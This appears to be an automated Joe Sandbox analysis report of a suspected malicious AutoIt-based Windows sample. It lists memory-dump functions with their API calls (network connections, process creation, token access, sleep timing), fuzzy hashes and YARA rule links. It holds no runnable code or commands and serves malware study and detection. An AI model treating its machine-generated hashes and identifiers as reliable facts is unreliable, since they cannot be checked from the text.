Instruction Fuzzy Hash: 6A216B71E00108EBDB10DFA4CA49BFEB7B8EF44308F154059E544A7241EB31AE05DB50

Function 00EC098C Relevance: 6.1, APIs: 4, Instructions: 79COMMON

Download Yara Rule

APIs

__setmode.LIBCMT ref: 00EC09AE

Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F07896,?,?,00000000), ref: 00EA5A2C
Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F07896,?,?,00000000,?,?), ref: 00EA5A50

_fprintf.LIBCMT ref: 00EC09E5
OutputDebugStringW.KERNEL32(?), ref: 00EF5DBB

Part of subcall function 00EC4AAA: _flsall.LIBCMT ref: 00EC4AC3

__setmode.LIBCMT ref: 00EC0A1A

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ByteCharMultiWide__setmode$DebugOutputString_flsall_fprintf
String ID:
API String ID: 521402451-0
Opcode ID: deda5295ea5759b88d3fd86aa28b6485c692101412a81ea10800fef807244963
Instruction ID: 304240c183ddaf0f33c7bb5dcf92f07a2cd15157a96fc0161eafc645e033a507
Opcode Fuzzy Hash: deda5295ea5759b88d3fd86aa28b6485c692101412a81ea10800fef807244963
Instruction Fuzzy Hash: F71127B2504208AFDB04B3B49C46EFE77E89F86320F10101DF2057A1C2EE725D4757A1

Function 00F11767 Relevance: 6.1, APIs: 4, Instructions: 78networkCOMMON

Download Yara Rule

APIs

InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00F117A3

Part of subcall function 00F1182D: InternetOpenUrlW.WININET(?,?,00000000,00000000,?,00000000), ref: 00F1184C
Part of subcall function 00F1182D: InternetCloseHandle.WININET(00000000), ref: 00F118E9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Internet$CloseConnectHandleOpen
String ID:
API String ID: 1463438336-0
Opcode ID: 5d5f6e6ab4083238f9a8b9bfa8c1bcd6fe9d6c06d502be21caf94c8102b7e2fd
Instruction ID: d029d018cc325d1f84794a432381eba1ca5f4f7c25c2269cda19aaa8f251d5eb
Opcode Fuzzy Hash: 5d5f6e6ab4083238f9a8b9bfa8c1bcd6fe9d6c06d502be21caf94c8102b7e2fd
Instruction Fuzzy Hash: BB21A432600605BFEB129F60DC01FFABBA9FF48720F10402EFA1196650D7759861B7A0

Function 00F03A2A Relevance: 6.1, APIs: 4, Instructions: 78COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNEL32(?,00F2FAC0), ref: 00F03A64
GetLastError.KERNEL32 ref: 00F03A73
CreateDirectoryW.KERNEL32(?,00000000), ref: 00F03A82
CreateDirectoryW.KERNEL32(?,00000000,00000000,000000FF,00F2FAC0), ref: 00F03ADF

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CreateDirectory$AttributesErrorFileLast
String ID:
API String ID: 2267087916-0
Opcode ID: f1a123bc3f7831508602d808ccc69bbe98a2f8630ff7402b0aef2320d22be917
Instruction ID: 8e75dc2feb2611817934af8113b5e4da5dbf3dc4fa613cfc85f3af7ec14c7184
Opcode Fuzzy Hash: f1a123bc3f7831508602d808ccc69bbe98a2f8630ff7402b0aef2320d22be917
Instruction Fuzzy Hash: 6A2194756082059FC310EF28C88186B77E8AE5A364F104A2DF4D9D72E1D735DE4AEB82

Function 00ED50E2 Relevance: 6.1, APIs: 4, Instructions: 67COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 00ED5101

Part of subcall function 00EC571C: __FF_MSGBANNER.LIBCMT ref: 00EC5733
Part of subcall function 00EC571C: __NMSG_WRITE.LIBCMT ref: 00EC573A
Part of subcall function 00EC571C: RtlAllocateHeap.NTDLL(016A0000,00000000,00000001,00000000,?,?,?,00EC0DD3,?), ref: 00EC575F

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: AllocateHeap_free
String ID:
API String ID: 614378929-0
Opcode ID: 66fa933b21e77f8ca67399faab02bb2ba42479663ced7722f7d68812ded94767
Instruction ID: 2060350a9a3d545e1c6e0a7fa32256ae2ff527a8bea794d8a67d9ceb02919243
Opcode Fuzzy Hash: 66fa933b21e77f8ca67399faab02bb2ba42479663ced7722f7d68812ded94767
Instruction Fuzzy Hash: B711E373502E15AFCB312FB4AE05B5E3BE8EB103A5B10652FF904BA350DE318C439690

Function 00EA44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00EA44CF

Part of subcall function 00EA407C: _memset.LIBCMT ref: 00EA40FC
Part of subcall function 00EA407C: _wcscpy.LIBCMT ref: 00EA4150
Part of subcall function 00EA407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EA4160

KillTimer.USER32(?,00000001,?,?), ref: 00EA4524
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00EA4533
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00EDD4B9

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
String ID:
API String ID: 1378193009-0
Opcode ID: 71eacb4bea1d40723f6e17eab4c22b478bb6d5d1257d6a0c462eccbc451cddb9
Instruction ID: 33b50d6c8cedce26b0825b425a392b6c6cc7f655e8f3cbadab2d8656e756815a
Opcode Fuzzy Hash: 71eacb4bea1d40723f6e17eab4c22b478bb6d5d1257d6a0c462eccbc451cddb9
Instruction Fuzzy Hash: D421FBB49087549FE7328B24CC55BE6BBECDB06318F04109EE69A6A281C7B43989D741

Function 00F16369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,00F07896,?,?,00000000), ref: 00EA5A2C
Part of subcall function 00EA5A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,00F07896,?,?,00000000,?,?), ref: 00EA5A50

gethostbyname.WSOCK32(?,?,?), ref: 00F16399
WSAGetLastError.WSOCK32(00000000), ref: 00F163A4
_memmove.LIBCMT ref: 00F163D1
inet_ntoa.WSOCK32(?), ref: 00F163DC

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
String ID:
API String ID: 1504782959-0
Opcode ID: c66fe915105b3c5f4cc7c045219e9323d5be2bcf6f90b3a5cf3c1a747775b671
Instruction ID: d30d145299dae37f4430afb4f88bd9808aafc4826c4b7731c10f458771f29315
Opcode Fuzzy Hash: c66fe915105b3c5f4cc7c045219e9323d5be2bcf6f90b3a5cf3c1a747775b671
Instruction Fuzzy Hash: 85115E32900109AFCB04FBA4DD46DEFB7F8AF09310B144065F505BB262DB31AE05EBA1

Function 00EF8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,000000B0,?,?), ref: 00EF8B61
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EF8B73
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EF8B89
SendMessageW.USER32(?,000000C9,?,00000000), ref: 00EF8BA4

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: MessageSend
String ID:
API String ID: 3850602802-0
Opcode ID: 738b3cd10647010c6cf422603da507e66a04512307d5203e9594bf7c38cc9815
Instruction ID: e67c5810335540c484f6534b63e970999c1d4a36e681ad518949a703d2a54525
Opcode Fuzzy Hash: 738b3cd10647010c6cf422603da507e66a04512307d5203e9594bf7c38cc9815
Instruction Fuzzy Hash: CC111879901218FFEB11DFA5CD85FADBBB8FB48710F2040A5EA00B7290DA716E11DB94

Function 00EA1290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON

Download Yara Rule

APIs

Part of subcall function 00EA2612: GetWindowLongW.USER32(?,000000EB), ref: 00EA2623

DefDlgProcW.USER32(?,00000020,?), ref: 00EA12D8
GetClientRect.USER32(?,?), ref: 00EDB5FB
GetCursorPos.USER32(?), ref: 00EDB605
ScreenToClient.USER32(?,?), ref: 00EDB610

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Client$CursorLongProcRectScreenWindow
String ID:
API String ID: 4127811313-0
Opcode ID: 1b2866b20e58c76450f2463c264fd55ac06c71f1e52418de35f6aae14cfc8a6d
Instruction ID: 128e96bcda2d4ad92da6ed74670d44fd39a1cf3c572df49e7e1a364cec46f204
Opcode Fuzzy Hash: 1b2866b20e58c76450f2463c264fd55ac06c71f1e52418de35f6aae14cfc8a6d
Instruction Fuzzy Hash: 3A11FB3551001DEBCB10DF98D985AEE7BB8EB0A301F5004A5F911EB151D730BA56ABB5

Function 00F01142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON

Download Yara Rule

APIs

QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EFFCED,?,00F00D40,?,00008000), ref: 00F0115F
Sleep.KERNEL32(00000000,?,?,?,?,?,?,00EFFCED,?,00F00D40,?,00008000), ref: 00F01184
QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,00EFFCED,?,00F00D40,?,00008000), ref: 00F0118E
Sleep.KERNEL32(?,?,?,?,?,?,?,00EFFCED,?,00F00D40,?,00008000), ref: 00F011C1

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CounterPerformanceQuerySleep
String ID:
API String ID: 2875609808-0
Opcode ID: bb930d1d96e6944502dfdbf9bfb70189b65256e33b9642188d3e3aa8998773da
Instruction ID: cf140a6828254264a930dd0d84c868ced01c056a2ad1cd048a9b7239a6efd6df
Opcode Fuzzy Hash: bb930d1d96e6944502dfdbf9bfb70189b65256e33b9642188d3e3aa8998773da
Instruction Fuzzy Hash: 01115A32C0061DE7CF149FA4D848AEEBBB8FF09711F904065EA40B2280CB709565EBA1

Function 00EFD831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 00EFD84D
LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 00EFD864
RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 00EFD879
RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 00EFD897

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Type$Register$FileLoadModuleNameUser
String ID:
API String ID: 1352324309-0
Opcode ID: 4ee28960a23b20a000f2f4477e4799d816861a679b4214ce068d7855588bcb4e
Instruction ID: f5e79909abbe0675e952aae61bce2b8ce1b7a3d04ef9725928bc594f8fe55c77
Opcode Fuzzy Hash: 4ee28960a23b20a000f2f4477e4799d816861a679b4214ce068d7855588bcb4e
Instruction Fuzzy Hash: 7C115E75609308EBE3249F50DC08FA6BBBDEB00B40F108569A656E6050D7B0E549ABA1

Function 00ED6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE

Download Yara Rule

APIs

__cftof_l.LIBCMT ref: 00ED6FDB

Part of subcall function 00ED76C2: __fltout2.LIBCMT ref: 00ED76EB

__cftog_l.LIBCMT ref: 00ED7001
__cftoe_l.LIBCMT ref: 00ED7033

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: __cftoe_l__cftof_l__cftog_l__fltout2
String ID:
API String ID: 3016257755-0
Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction ID: 6c90bd90f8ef07d4ef39de19c5111735d3e7ca48019651380ab4485896151ef0
Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
Instruction Fuzzy Hash: FB014C7244814ABBCF165F84DC01CEE3F62FB18355F589456FE9868271E237C9B2AB81

Function 00F2B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON

Download Yara Rule

APIs

GetWindowRect.USER32(?,?), ref: 00F2B2E4
ScreenToClient.USER32(?,?), ref: 00F2B2FC
ScreenToClient.USER32(?,?), ref: 00F2B320
InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 00F2B33B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ClientRectScreen$InvalidateWindow
String ID:
API String ID: 357397906-0
Opcode ID: a41bae7e811d35ded3ffc1a273ea83516d4b272d55171d9c433cc087c7cde8c6
Instruction ID: b0cd2aafa9d141f92961d93a2cfd99f89bbc9ba90215f7c65a7b6c5aa4bdfcc8
Opcode Fuzzy Hash: a41bae7e811d35ded3ffc1a273ea83516d4b272d55171d9c433cc087c7cde8c6
Instruction Fuzzy Hash: 8E1143B9D0020DEFDB51CFA9D8849EEBFB9FB08310F108166E914E3620D735AA559F51

Function 00F2B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00F2B644
_memset.LIBCMT ref: 00F2B653
CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00F66F20,00F66F64), ref: 00F2B682
CloseHandle.KERNEL32 ref: 00F2B694

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: _memset$CloseCreateHandleProcess
String ID:
API String ID: 3277943733-0
Opcode ID: 1b478088c0d947d781a27d8656515d319b56e7db57e12185e991d29adbedc084
Instruction ID: a730a81dbda2c905d86c8027c3363bba108805412fd8c604be8e8abf679e187f
Opcode Fuzzy Hash: 1b478088c0d947d781a27d8656515d319b56e7db57e12185e991d29adbedc084
Instruction Fuzzy Hash: 33F082B25403087BE3106761BC16FBB3E9CEB18395F004034FB09E5192E7B24C01B7A8

Function 00F06BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(?), ref: 00F06BE6

Part of subcall function 00F076C4: _memset.LIBCMT ref: 00F076F9

_memmove.LIBCMT ref: 00F06C09
_memset.LIBCMT ref: 00F06C16
LeaveCriticalSection.KERNEL32(?), ref: 00F06C26

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CriticalSection_memset$EnterLeave_memmove
String ID:
API String ID: 48991266-0
Opcode ID: 11d772560a1cc0ff41d24dd5f8a9c02a3b2c592e3bf6aff843e6e0c476415ed3
Instruction ID: ef1b247759c732f6000243e5703584df1a564c65db3dd6f328c3f89804cd53ab
Opcode Fuzzy Hash: 11d772560a1cc0ff41d24dd5f8a9c02a3b2c592e3bf6aff843e6e0c476415ed3
Instruction Fuzzy Hash: 5EF0543A100104ABCF016F95DC85E4ABF69EF45360F048065FE096E267CB36E812EBB4

Function 00EA2218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000008), ref: 00EA2231
SetTextColor.GDI32(?,000000FF), ref: 00EA223B
SetBkMode.GDI32(?,00000001), ref: 00EA2250
GetStockObject.GDI32(00000005), ref: 00EA2258
GetWindowDC.USER32(?,00000000), ref: 00EDBE83
GetPixel.GDI32(00000000,00000000,00000000), ref: 00EDBE90
GetPixel.GDI32(00000000,?,00000000), ref: 00EDBEA9
GetPixel.GDI32(00000000,00000000,?), ref: 00EDBEC2
GetPixel.GDI32(00000000,?,?), ref: 00EDBEE2
ReleaseDC.USER32(?,00000000), ref: 00EDBEED

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
String ID:
API String ID: 1946975507-0
Opcode ID: 6f54d51278b0e0071acdf3bcc5088530eb49afe632f0a52fb2a6bb367b7c18e7
Instruction ID: 688b3ba146ea6a5e96be866f1662a6360c2c8f615d2978b0f97e281eaf5ee94b
Opcode Fuzzy Hash: 6f54d51278b0e0071acdf3bcc5088530eb49afe632f0a52fb2a6bb367b7c18e7
Instruction Fuzzy Hash: BEE03031514148EADB215F64EC0DBD83B20EB05336F048376FA69980E197714596EB11

Function 00EF8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON

Download Yara Rule

APIs

GetCurrentThread.KERNEL32 ref: 00EF871B
OpenThreadToken.ADVAPI32(00000000,?,?,?,00EF82E6), ref: 00EF8722
GetCurrentProcess.KERNEL32(00000028,?,?,?,?,00EF82E6), ref: 00EF872F
OpenProcessToken.ADVAPI32(00000000,?,?,?,00EF82E6), ref: 00EF8736

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: CurrentOpenProcessThreadToken
String ID:
API String ID: 3974789173-0
Opcode ID: 372f1ca78ea5ec8431f75f206153b66866fe1ffb335dc996c4ac32d5f822fa4f
Instruction ID: 3e29644425f7e1e0215574c56fae69e9483b5f351c33f94b1f4a73ee0b1643a7
Opcode Fuzzy Hash: 372f1ca78ea5ec8431f75f206153b66866fe1ffb335dc996c4ac32d5f822fa4f
Instruction Fuzzy Hash: 4FE08636621215DBD730AFB05E0CF563BBCEF55795F148838B245D9080DA38844AD750

Function 00EFB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON

Download Yara Rule

APIs

OleSetContainedObject.OLE32(?,00000001), ref: 00EFB4BE

Strings

AutoIt3GUI, xrefs: 00EFB436
Container, xrefs: 00EFB43B

Memory Dump Source

Source File: 00000000.00000002.2357108813.0000000000EA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00EA0000, based on PE: true

Associated: 00000000.00000002.2356849172.0000000000EA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F2F000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357803659.0000000000F54000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2357928004.0000000000F5E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2358102787.0000000000F67000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_ea0000_vnV17JImCH.jbxd

Similarity

API ID: ContainedObject
String ID: AutoIt3GUI$Container
API String ID: 3565006973-3941886329
Opcode ID: decb8c5208e82c7af60a54e733570bc173760080230e71801886db1fb7588d86
